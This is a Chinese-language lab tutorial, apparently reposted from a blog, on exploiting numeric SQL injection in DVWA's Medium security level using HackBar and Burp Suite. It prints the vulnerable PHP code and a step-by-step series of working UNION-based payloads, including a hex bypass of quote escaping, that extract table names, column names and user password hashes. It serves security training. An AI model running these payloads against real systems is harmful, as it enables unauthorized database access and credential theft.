渗透测试之DVWA的Medium级别的SQL注入

其他 2018-08-16 10:10:58 阅读次数: 0

Medium SQL Injection Source是通过一个下拉表的方式提交数据的。选择数据后提交,发现URL不是GET注入是把提交的数据存放到post数据中

先把源代码放出来

<?php
 
if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];
	$id = mysql_real_escape_string( $id );
 
	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
 
	// Get results
	$num = mysql_numrows( $result );
	$i   = 0;
	while( $i < $num ) {
		// Display values
		$first = mysql_result( $result, $i, "first_name" );
		$last  = mysql_result( $result, $i, "last_name" );
 
		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
 
		// Increase loop count
		$i++;
	}
 
	//mysql_close();
}
 
?>

可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。

我们可以用hackbar或者用burpsuite抓包试一下。

一:Hack Bar

1、添加post数据如下 ,点击POST

2、我们可以在这里添加注入语句:id=3 union select 1,database()#&Submit=Submit。获得当前数据库为dvwa,再用LOW级别手工注入同样的方法获取其他数据库信息。

二:BurpSuite

这里我说一下代理工具Proxy SwitchyOmega,可以轻松快捷地管理和切换多个代理设置。BurpSuite抓包改参数,提交恶意构造的查询参数。
1.判断是否存在注入,注入是字符型还是数字型
抓包更改参数id为2' or 1=1 #,报错。也可以右键Send to Repeater发送到Repeater,在Repeater模拟浏览器访问,成功了再改。

抓包更改参数id为2 or 1=1 #,查询成功。

说明存在数字型注入。由于是数字型注入,服务器端的mysql_real_escape_string函数就形同虚设了,因为数字型注入并不需要借助引号。

2、猜解SQL查询语句中的字段数。抓包更改参数id为2 order by 2 #,查询成功。抓包更改参数id为2 order by 3 #,报错。

说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname。

3、确定显示的字段顺序。抓包更改参数id为2 union select 1,2 #,查询成功。

4、获取当前数据库。抓包更改参数id为2 union select 1,database() #,查询成功。

5、获取数据库中的表。抓包更改参数id为2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查询成功。

一共有两个表,guestbook与users。

6、获取表中的字段名。抓包更改参数id为2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#,查询失败。

这是因为单引号被转义了,变成了\'。可以利用16进制进行绕过,抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #,查询成功。

说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

7、下载数据。抓包修改参数id为1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功。

猜你喜欢

转载自blog.csdn.net/weixin_40586270/article/details/81665850
今日推荐
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
报告:Django 仍然是 74% 开发者的首选
《2024 年一季度互联网投融资运行情况》研究报告
15 年前上了“FFmpeg 耻辱柱”,今天他还得谢谢咱——腾讯QQPlayer一雪前耻?
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
周排行
curl的POST请求,封装方法
8.1.1. Integer Types
Java基础 Day05(个人复习整理)
Python - Django - 中间件 process_exception
小L的试卷
【Shell编程】 (函数)判断用户是否存在
python(css样式)
spring ant path 匹配原则 - 【笔记】
《JavaScript与JScript从入门到精通》(美)James.Jaworski.中译本.扫描版.pdf
Eclipse运行带参数的java程序
每日归档
更多
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022